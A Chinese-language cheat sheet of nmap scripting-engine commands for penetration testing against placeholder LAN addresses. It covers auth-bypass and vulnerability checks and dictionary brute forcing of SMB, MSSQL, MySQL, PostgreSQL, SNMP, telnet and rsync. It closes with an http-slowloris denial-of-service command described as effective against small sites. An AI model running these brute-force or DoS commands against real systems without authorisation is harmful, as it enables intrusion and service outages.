Nmap利用脚本进行渗透
(1) nmap --script=auth 192.168.137.x
负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令
(2)nmap --script=brute 192.168.137.x
提供暴力破解的方式 可对数据库,smb,snmp等进行简单密码的暴力猜解
(3)nmap --script=default 192.168.137.x 或者 nmap -sC 192.168.137.x
默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻
(4)nmap --script=vuln 192.168.137.x
检查是否存在常见漏洞
(5)nmap -n -p445 --script=broadcast 192.168.137.x
在局域网内探查更多服务开启状况
(6)nmap --script external 202.103.243.x
利用第三方的数据库或资源,例如进行whois解析
vnc扫描:
(1) 检查vnc bypass
nmap --script=realvnc-auth-bypass 192.168.137.x
(2)检查vnc认证方式
nmap --script=vnc-auth 192.168.137.x
(3)获取vnc信息
nmap --script=vnc-info 192.168.137.x
smb扫描:
(1)smb破解
nmap --script=smb-brute.nse 192.168.137.x
(2)smb字典破解
nmap --script=smb-brute.nse --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.x
(3)smb已知几个严重漏
nmap --script=smb-check-vulns.nse --script-args=unsafe=1 192.168.137.x
(4)系统信息
nmap -n -p445 --script=smb-os-discovery.nse --script-args=smbuser=test,smbpass=test192.168.137.x
(5)猜解mssql用户名和密码
nmap -p1433 --script=ms-sql-brute --script-args=userdb=/var/passwd,passdb=/var/passwd192.168.137.x
Mysql扫描:
(1)扫描root空口令
nmap -p3306 --script=mysql-empty-password.nse 192.168.137.x
(2)列出所有mysql用户
nmap -p3306 --script=mysql-users.nse --script-args=mysqluser=root 192.168.137.x
(3)支持同一应用的所有脚本扫描
nmap --script=mysql-* 192.168.137.x
其他一些常用的脚本
nmap --script=broadcast-netbios-master-browser 192.168.137.x
发现网关
nmap -p 873 --script rsync-brute --script-args ‘rsync-brute.module=www’ 192.168.137.x
破解rsync
nmap --script informix-brute -p 9088 192.168.137.x
informix数据库破解
nmap -p 5432 --script pgsql-brute 192.168.137.x
pgsql破解
nmap -sU --script snmp-brute 192.168.137.x
snmp破解
nmap -sV --script=telnet-brute 192.168.137.x
telnet破解
nmap --script=http-methods.nse 192.168.137.x
检查http方法
nmap --script http-slowloris --max-parallelism 400 192.168.137.x
dos攻击,对于处理能力较小的站点还挺好用的 ‘half-HTTP’ connections